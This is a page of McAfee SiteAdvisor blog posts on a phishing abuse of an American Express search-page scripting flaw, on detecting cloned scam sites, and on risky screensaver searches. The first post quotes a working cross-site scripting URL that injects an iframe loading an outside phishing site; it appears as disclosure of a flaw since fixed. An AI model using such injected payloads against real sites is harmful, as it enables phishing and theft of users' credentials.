McAfee SiteAdvisor Blog

Phisher takes advantage of American Express mistake

Earlier this week, Dan Nunes, one of our software engineers, was reviewing a phishing feed when he noticed a link that pointed to americanexpress.com. At first, Dan was surprised that a financial institution would be so careless as to leave an unprotected redirect on its site. After all, financial institutions are often the targets of such phishing attacks. Upon closer examination of the link, however, he noticed javascript code present within the URL. The code appeared to load a frame to another site, www.cgieich.com, which at the time of this writing was mimicking the site of an Italian bank, Banka Intesa:

The need for legitimacy

A while back, we wrote an article examining the economics of phishing. In the piece, we allude to the fact that ideally, phishers like to hijack real sites to transmit stolen data back to themselves. It is not uncommon for a phisher to utilize Google or Yahoo redirects to make a link look more legitimate. Sites often use these "open redirects" to keep track of what links a user visits on their site by directing the user through a script on the host site before directing them to another site. Phishing attacks of this nature are often easy for a consumer to identify because even though the link that was clicked looked like it was going to Google, for example, the address bar will indicate that the site that eventually loaded was not in fact Google.

The basic definition of a phisher is someone who attempts to con users into providing personal or financial information to a fake site under the auspices that they are interacting with a legitimate site. A fundamental tenet of phishing is that the more legitimate the site looks, the more people will be convinced to provide their information. What we saw on the feed was troubling in that regard.

Scripting for profit

Take a look at this:

http://search.americanexpress.com/amex/?q=%3Cscript%3Edocument.write%28%22%3C iframe+src%3D%27http%3A%2F%2Fwww.cgieicg.com%27+FRAMEBORDER%3D%270%27+WIDTH%3D% 27800%27+HEIGHT%3D%27640%27+scrolling%3D%27auto%27%3E%3C%2Fiframe%3E%22%29%3C%2F script%3E&site=amerexpress&client=amerexpress&output=amerexpress&restrict=US

The link itself points to the search results page on the American Express website. Dan found that the vulnerability arises from the fact that the query string passed to the search is displayed within the resulting page. Phishers exploited this fact to insert their own code onto the page. Since the resulting page appears to be a legitimate page within the American Express site, an unsuspecting user that fails to notice the "Search results" heading on the page or the formatting errors may be fooled into thinking he or she is sending information to a legitimate banking portal.

This vulnerability is especially glaring when one considers the fact that virtually any script could have been executed by this method. A phisher could have created a fake login form for American Express itself, leaving little clue that a user was giving his or her information to a third party. Slightly altering the link, Dan notes, can change the page that is loaded:

Before running this article, Dan contacted the anti-phishing group at American Express and they have since fixed the vulnerability. Unfortunately, the average consumer that engages in online banking can not even trust that legitimate sites are not inadvertently aiding phishers in their fraudulent collection of consumer information. Fortunately, one hurdle that phishers face is that they need to deliver their unsafe links to the consumers to get them to visit the fraudulent sites. Thanks in a large part to the banking institutions that have gone to great lengths in order to educate their customers about the dangers of phishing and ways to identify possible fraudulent sites, consumers are getting smarter about remaining skeptical of any link received through e-mails. By making sure only to provide personal information to sites received from a trusted source, and utilizing the free services of SiteAdvisor to aid in identifying potentially dangerous sites, consumers can stay safe amid the daily hazards of the web.

Update

A quick note. We wanted to remind readers that McAfee's SiteAdvisor plug-in warns users about a wide range of site-based threats including spyware, spam and exploits, but for anti-phishing and more complete threat protection, readers should look at our award winning security suites.

Permalink | Comments (2) | TrackBacks (0)

Is Google Adwords getting scammed? McAfee SiteAdvisor has a solution.

The Web is full of interesting people. Take Ken Miyazawa, for example.

Ken is a man of strong opinions. Check out his endorsement of mymusicinc.com:

"I am very impressed with the speed of your download technology. The quality of the music is superior to my prior service."

He says the same thing about mimem.org/emusic:

"I am very impressed with the speed of your download technology. The quality of the music is superior to my prior service."

Peter Sanchez agrees. He has this to say about K-Lite Pro:

"I am very impressed with the speed of your download technology. The quality of the music is superior to my prior service."

Cindy Griffin is also a convert to K-Lite Pro, though not for Peter's reasons:

"I just happened to get into this, and now this is one of my favourite sites. I visit very often to get new music, softwares and stuff. Really a cool one. Thanx to the team." (sic)

She's identically effusive about k-lite.tk.

"...now this is one of my favourite sites."

In fact, Cindy is so compelling that her opinions themselves are worth copying. Hendick (sic?) Theodore writes that he too:

"...just happened to get into this, and now this is one of my favourite sites. I visit very often to get new music, softwares and stuff. Really a cool one. Thanx to the team."

Wow. Steve Richards feels the same way about Ares Ultra:

"I just happened to get into this, and now this is one of my favourite sites. I visit very often to get new music, softwares and stuff. Really a cool one. Thanx to the team."

What’s going on here? Has someone finally cloned a human being? Or is a massive wave of plagiarism sweeping the web?

The Clone Wars

What’s going on is that the bad guys are using shortcuts, and we’ve found a way to cut them off at the pass. Why are there so many nearly identical scam sites on the web? One reason for this proliferation is the quest for the perfect site, the one that maximizes profits and minimize costs. And we can safely assume that profit maximization can be enhanced by testing sales pitch variations. Does site design A yield better click-through than site design B? What about site design C? Cost minimization can be enhanced by making site changes incrementally. Swap this graphic for that graphic, but keep the text and HTML. Change the URL but keep the text. Rearrange frames in the HTML but keep the graphics the same.

Ben Edelman, a technical advisor to SiteAdvisor and a spyware researcher, noted another, perhaps more significant motivation. Recall a recent announcement by Google announcing a change in Adwords policy. Going forward, Adwords would allow at most one ad listing for a given landing domain name. By copying the same site onto multiple domain names, a site can try to avoid this restriction and get multiple ad listing slots. It's possible that small tweaks like variations in color scheme, text or layout could also helpful to this end, in preventing Google's automated (and perhaps also human) reviewers from flagging all the sites as dupes.

When we first noticed these common text strings for file sharing scam sites, we asked Hugo Liu, a post-doc at the MIT Media Lab and another one of our technical advisors, if there was any way he could use this to help. Hugo specializes in semantic analysis. He tries to find patterns and meaning in what appear to be random data. Hugo began to play.

What would happen, Hugo wondered, if you took an interesting phrase and created a map of sites that shared that phrase? If the phrase originated from a known scam site, could it be used as a prospecting tool to find other similar scam sites? Perhaps clones of the original?

Hugo found that once a strong phrase is identified, it can be tested against a group of public Web sites. Think of the
process as passing a lens over a stream of text as you look for a string of key words. Hugo likens it to a kid passing a magic decoder over a "spy" book. This windowing, as the process is known in corpus-based linguistics, works because bad actors re-use content in their effort to maximize profit and minimize cost.

Building a case

Hugo noticed that text analysis alone delivered a lot of false positives. For example, early efforts at clone detection
yielded a lot of Wikipedia trawling sites – sites that copy a Wikipedia excerpt and then surround it with text ads. Other results had parasitically pulled text from many different sites, presumably in an effort to increase their reach in search engine results or piggbyback on a more established brand. Distasteful for sure, but not a scam, at least as defined by SiteAdvisor.

Shared phrasing is like circumstantial evidence. It’s enough to bring a suspect in, but typically insufficient to convict. Hugo needed a DNA match and he found it in structural analysis.

Web developers know that a lot of HTML production is idiosyncratic. Could decisions like when to capitalize a tag be used as evidence of cloning? The answer is yes. The developer of a scam site typically reuses the template as much as possible to reduce time and cost. Consequently, any of the developer’s original quirks inherent in the template get replicated. And that gives us a huge clue.

U2canbecloned

Lead Streams Marketing is a multi-level marketing company that offers "the Home Business System" as one of its programs. Our traditional testing discovered 4thepackage.com, an LSM affiliate, and rated it red for sending high-volume, somewhat spammy e-mail. Clone detection recently uncovered u2canbesuccessful.com. The sites are identical except for a tiny bit of text indicating ownership.

LeadStream isn't the only company posting many copies of a single web site. We've long followed sites set up by MarketEngines, CashEngines and Euclid Networks (the last company purportedly of the island of St. Kitts). Many of their sites are scams -- charging users for software that can be found elsewhere for free, and purporting to offer tech support that we've found to be practically nonexistent. They post some sites themselves, and they pay affiliates to post copies of these sites. For example, consider imusicaccess.com:

Now, compare it to imusicnow and winmx-downloading. Structure and layout are nearly identical. The occasional font, a few strings of text and some color schemes are all that separates these clones from one another:

These sites are clones of each other but can’t be detected using SiteAdvisor’s other automated tests because their red ratings are not due to e-mail practices or bundled spyware but because they provide services of low or no value. Clone detection lets us flag all these duplicate sites. After we identify the problem with one such site, clone detection helps us make sure we catch all its copies too.

Harder and harder to hide

Human beings are pretty sophisticated consumers but when it comes to the Web, it’s relatively easy to fool our "sixth sense." If the site looks well produced, if it appears to have original content, it’s relatively easy to overcome our basic level of skepticism. In the absence of a tool like clone detection, a typical consumer will be hard pressed to know that a particular site is a template that shares 95% of its text and 95% of its HTML with a With a site known to provide a bad value.

While clone detection uses technical algorithms, it succeeds thanks to economic fundamentals. Financially motivated scammers need customers, so they have no choice but to use public methods like search engine ads to reach their victims. That need to be public is their Achilles heel. Along with our automated testing for spam, spyware and exploits, tools like clone detection make it increasingly efficient for us to search for and find the bad guys.

Permalink | Comments (2) | TrackBacks (0)

MLB's greatest players and teams ranked by the danger of their screensaver searches

Barry Bonds, Derek Jeter, and Albert Pujols are household names for any baseball fanatic. They also lead the pack of the most hazardous players in McAfee's survey of the most risky baseball screensaver searches. We tested each of Major League Baseball’s 1,224 players by passing their names through Google and adding the word screensaver. Search results were enhanced by our database of 4.5 million Web safety ratings.

Searching for screensavers for Bonds, Jeter or Pujols and clicking on one of the results will give a PC a .600 "Earned Risk Average" (ERA) – in other words, a 60% chance of landing at a dangerous site. Josh Fogg of the Colorado Rockies is the only player to score higher, with 75% of his results tainted by sketchy behavior and software. Nearly three hundred players scored 30% or worse. The average ERA for the entire league was 18%.

The tech community knows that screensavers are prime candidates for adware bundles. The average Web consumer, however, is being taken advantage of. According to Yahoo's keyword selector tool Yahoo! had roughly 3.5 million searches in May for "screensaver," "wallpaper" and related search terms. Given that Yahoo accounts for 23% of all searches, an estimated 15.1 million total searches for these desktop visual enhancements are conducted each month.

How unsafe is it to search for your favorite player? Find out the stats in McAfee SiteAdvisor’s All-Star Game of Spyware Survey.

Permalink | TrackBacks (0)